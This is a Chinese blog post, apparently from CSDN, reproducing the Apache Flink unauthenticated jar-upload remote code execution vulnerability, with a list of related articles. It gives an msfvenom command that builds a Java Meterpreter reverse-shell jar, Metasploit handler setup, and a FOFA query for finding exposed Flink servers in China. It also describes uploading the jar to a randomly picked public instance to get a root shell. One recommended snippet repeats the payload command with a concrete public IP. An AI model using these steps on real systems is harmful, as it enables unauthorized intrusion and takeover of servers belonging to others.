[漏洞复现]Apache Flink未授权访问+远程代码命令执行

最新推荐文章于 2022-06-07 10:56:13 发布
最新推荐文章于 2022-06-07 10:56:13 发布
阅读量2.5k 收藏 4
点赞数 1
分类专栏: Web安全 文章标签: Apache Flink Apache 未授权访问 命令执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cj_allen/article/details/109267119
版权

前言:

近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞,影响范围:<= 1.9.1(最新版本)
但是作者通过测试在版本Version: 1.11.2也是受影响的,此次复现就是通过版本Version: 1.11.2进行复现利用。

漏洞复现:

首先通过msfveon生成jar包,命令:

msfvenom -p java/meterpreter/reverse_tcp LHOST=公网IP地址 LPORT=监听端口 -f jar > rce.jar

在这里插入图片描述
然后启动msf加载载荷:

use exploit/multi/handler
set payload java/shell/reverse_tcp

在这里插入图片描述
在这里插入图片描述
我这里监听的是127.0.0.1,端口为4444(由于作者这里在公网上没有kali,所以用的是虚拟机的kali通过Ng进行内网转发的。)
设置好了以后,执行exploit监听。

在这里插入图片描述

接下来通过fofa关键词搜索:app="APACHE-Flink" && country="CN"
任意点击访问如下:

在这里插入图片描述
来到如下界面:

在这里插入图片描述上传生成的jar包
在这里插入图片描述

上传好了以后点击Submit即可触发命令执行漏洞,回到msf上查看是否有session返回,确实有session返回,并且为root权限。

在这里插入图片描述

zhzhzh777
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Apache Flink 授权远程代码执行提权(实战)
失心少年
12-04 1179
1、fofa 搜索 app=“Apache-Flink” 可以看到有上千个 2、生成木马 下面展示一些 。 msfvenom -p java/meterpreter/reverse_tcp LHOST=47.103.79.70 LPORT=4444 -f jar > rce.jar 3、打开msf 进行如下配置,并进行监听 下面展示一些 。 3、上传刚才生成的木马,并执行 4、看到shell已经反弹回来 5、通过id 、 whoami 、cat /etc/passwd等命令查看当前用户及权
Apache-flink 授权访问任意jar包上传反弹shell.MD
04-12
Apache-flink 授权访问任意jar包上传反弹shell
Apache Flink 授权远程代码执行检查
weixin_42299610的博客
06-07 1673
Apache Flink 授权远程代码执行检查
Apache Flink漏洞复现(授权访问&上传jar包getshell)
qq_43244584的博客
01-26 3958
Apache Flink漏洞复现(授权访问&上传jar包getshell) 一、Flink简介 Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。 二、漏洞介绍 ​ Apache Flink Dashboard默认没有用户权限认证 ​ 攻击者可以通过授权Flink Dashboard控制台 ​ 直接上传木马jar包 ​ 可远程执行任意系统命令获取服务器权限
漏洞修复】修复 Apache Flink Web Dashboard 授权访问远程命令执行漏洞
RobinWang的博客
01-15 7466
漏洞修复】修复 Apache Flink Web Dashboard 授权访问远程命令执行漏洞 介绍 攻击者通过Flink Web Dashboard上传含有恶意代码的jar包进行攻击,中招会使服务器占满CPU沦为挖矿机,非常猖獗 通过反编译得到的恶意代码: package com.example; import java.io.IOException; public class Mai...
Apache Flink 授权访问+远程代码执行.pdf
最新发布
04-30
Apache Flink 授权访问+远程代码执行.pdf,该漏洞可以上传任意Jar包导致远程代码执行
xiejingjing1#PeiQi-WIKI-POC#Apache Flink 小于1.9.1远程代码执行 CVE-2020-
07-25
漏洞描述近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行漏洞.漏洞影响国内还是很多使用 Apache Flink 的,大
Apache+Flink+v1.9+官方中文文档2.zip
03-21
Apache+Flink+v1.9+官方中文文档2 Apache+Flink+v1.9+官方中文文档2 Apache+Flink+v1.9+官方中文文档2 Apache+Flink+v1.9+官方中文文档2 Apache+Flink+v1.9+官方中文文档2
Apache Flink是一个面向分布式数据流处理和批量数据处理的开源计算平台,它能够基于同一个Flink运行时+源代码文档说明
04-22
不懂运行,下载完可以私聊问,可远程教学 该资源内项目源码是个人的毕设,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! <项目介绍> 1、该资源内项目代码都经过测试运行成功,...
基于Flink+FlinkCDC+FlinkSQL+Clickhouse构建实时数据仓库课程
10-26
基于Flink+FlinkCDC+FlinkSQL+Clickhouse构建实时数据仓库课程,2022年新课,flink1.14版本
apache漏洞汇总apache漏洞汇总
03-29
Apache-flink 授权访问任意jar包上传反弹shell CVE-2019-0193 Apache-Solr via Velocity template RCE CVE-2019-17564 Apache-Dubbo反序列化漏洞 CVE-2020-13925 Apache Kylin 远程命令执行漏洞 CVE-2020-13957 ...
flume+kafka+flink+mysql数据统计
04-20
flume+kafka+flink+mysql实现nginx数据统计与分析
Stream+Processing+with+Apache+Flink2019.pdf
09-29
Stream Processing With Apache Flink See how to get started with writing stream processing algorithms using Apache Flink. by reading a stream of Wikipedia edits and getting some meaningful data out of ...
Apache Flinkflink-1.15.0-src.tgz)
05-07
Apache Flinkflink-1.15.0-src.tgz)是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序,Flink的流水线运行时系统可以...
Apache Flink授权访问-远程代码命令执行-复现
thelostworld
10-24 518
​好久没更新了,今天趁1024更新一篇,最近工作中遇到这个漏洞,今天自己来做一下这个漏洞复现Apache Flink授权访问-远程代码命令执行-复现一、漏洞简介Apache Flink Dashboard默认没有用户权限认证。攻击者可以通过授权Flink Dashboard控制台,直接上传木马jar包,可远程执行任意系统命令获取服务器权限,风险极大。二、影响版本Apache Flink &...
Apache Flink 授权访问+远程代码执行
Birdman-one的博客
12-11 2015
Apache Flink 授权访问+远程代码执行 作者:Birdman-one 前言 近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行漏洞,影响范围:<= 1.9.1(最新版本) 此次复现就是通过版本Version: 1.10.1进行复现利用。 FOFA FOFA 语句 app="Apache-Flink" && country="CN" app="Apache-Flink" && country="CN" &&am
2020-10-24Apache Flink授权访问-远程代码命令执行-复现
thelostworld
10-24 949
​好久没更新了,今天趁1024更新一篇,最近工作中遇到这个漏洞,今天自己来做一下这个漏洞复现Apache Flink授权访问-远程代码命令执行-复现 一、漏洞简介 Apache Flink Dashboard默认没有用户权限认证。攻击者可以通过授权Flink Dashboard控制台,直接上传木马jar包,可远程执行任意系统命令获取服务器权限,风险极大。 二、影响版本 Apache Flink <= 1.9.1(最新版本) 三、漏洞复现 1、生成反弹jar包 msfv..
【CVE】CVE-2020-17518 & CVE-2020-17519:Flink 任意文件上传 & 授权访问
边扯边淡
05-09 2453
起序:漏扫完看报告的时候发现的,复现学习一下。 一、靶场环境 使用的是 github 上的 vulhub 环境。因为 Flink 中的 CVE-2020-17518 和 CVE-2020-17519 在 Flink/1.11.2 版本都存在。 vulhub:https://github.com/vulhub/vulhub 1、漏洞描述:任意文件上传 & 授权访问 CVE 编号 名称 危害 CVE-2020-17518 任意文件上传 应用系统在文件上传功能处对用户上传.
apache flink文件上传漏洞修复
05-20
Apache Flink是一个分布式流处理框架,从版本1.0.0到1.4.0存在文件上传漏洞,攻击者可以通过该漏洞上传恶意文件并在服务器上执行任意代码,造成严重的安全风险。以下是修复该漏洞的步骤: 1.升级Apache Flink版本至1.4.1及以上版本,因为该版本已经修复了文件上传漏洞。 2.移除flink-runtime-web模块,因为该模块是漏洞的根源。可以通过修改pom.xml文件中的依赖关系来实现该操作。 3.禁用Flink的Web UI界面,因为该界面是攻击者上传恶意文件的入口。可以通过修改conf/flink-conf.yaml文件中的配置来实现该操作,具体内容如下: ``` #disable flink web ui web.submit.enable: false ``` 4.限制Flink集群的访问权限,防止授权的用户上传恶意文件。可以通过修改conf/flink-conf.yaml文件中的配置来实现该操作,具体内容如下: ``` #set flink rest api host and port rest.address: 127.0.0.1 rest.port: 8081 #set flink jobmanager rpc address and port jobmanager.rpc.address: 127.0.0.1 jobmanager.rpc.port: 6123 ``` 以上是修复Apache Flink文件上传漏洞的步骤,建议尽快采取措施以保证系统安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值